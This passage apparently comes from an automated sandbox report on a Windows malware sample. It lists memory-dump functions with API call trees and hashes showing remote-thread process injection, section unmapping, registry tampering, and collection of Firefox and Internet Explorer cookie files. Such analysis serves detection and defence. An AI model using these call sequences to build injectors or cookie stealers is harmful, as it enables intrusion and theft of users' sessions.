  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
